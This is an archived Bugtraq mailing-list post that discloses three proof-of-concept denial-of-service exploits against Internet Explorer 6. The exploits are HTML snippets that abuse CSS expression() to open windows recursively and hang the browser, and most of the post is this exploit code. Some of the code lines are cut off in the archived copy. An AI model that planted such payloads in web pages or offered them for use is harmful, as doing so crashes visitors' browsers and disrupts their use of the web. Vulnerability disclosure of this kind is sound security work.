Internet Explorer 6. CSS Expression Denial of Service (P.o.C.)

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Internet Explorer 6. CSS Expression Denial of Service (P.o.C.)
From: José Carlos Nieto Jarquín <xiam.core@xxxxxxxxx>
Date: Wed, 06 Dec 2006 00:30:39 -0600
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:user-agent:mime-version:to:subject:content-type:content-transfer-encoding; b=XC/FW9C060iHTAGJH1tQ5mkNGY9kJ8gyoi2emMC4ZCqCrNN//glZfQuv7XjOEAmOjJOZXWaMBd+/OKD1DbBrT3CpQGJahirRBW4yOhqHiQ6J7Pn+mYYHfbGS9u74waIiCfMhe0oVoU0/d+y4szqGs33mE9gCqFNVYG+NpTnWxWo=
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Thunderbird 1.5.0.8 (X11/20061025)

This is just another couple of exploits for this well-known browser. Thethird one is a lame combination of both.


Tested under Windows XP SP2, MSIE 6.0.2900.2180

--- Exploit 1 ---
       <div id="foo" style="height: 20px; border: 1px solid blue">

<table style="border: 1px solid red; width:expression(document.getElementById

           <tr><td></td></tr>
           </table>
       </div>
--- end ---

--- Exploit 2 ---
       <div style="width: expression(window.open(self.location));">
           &nbsp;
       </div>
--- end ---

--- Exploit 3 (combined) ---
<html>
   <head>
       <title>Another non-standards compliant IE D.o.S. </title>
   </head>
   <body>
       <div id="foo" style="height: 20px; border: 1px solid blue">

<table style="border: 1px solid red; width:expression(parseInt(window.open(self.location))+document.getElementById

           <tr>
               <td>
                   IE makes my life harder :-(. It sucks, don't use it :-).
               </td>
           </tr>
           </table>
       </div>
       Proof of Concept written by <a href="http://xiam.be";>xiam</a>.<br />
       Tested under Windows XP SP2, MSIE 6.0.2900.2180
   </body>
</html>
---

--
La civilizaci~n no suprime la barbarie, la perfecciona. - Voltaire
- J. Carlos Nieto (xiam). http://xiam.be

Prev by Date: Barracuda Convert-UUlib library buffer overflow leads to remote compromise
Next by Date: Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
Previous by thread: Barracuda Convert-UUlib library buffer overflow leads to remote compromise
Next by thread: Re: Internet Explorer 6 CSS "expression" Denial of Service Exploit (P.o.C.)
Index(es):
- Date
- Thread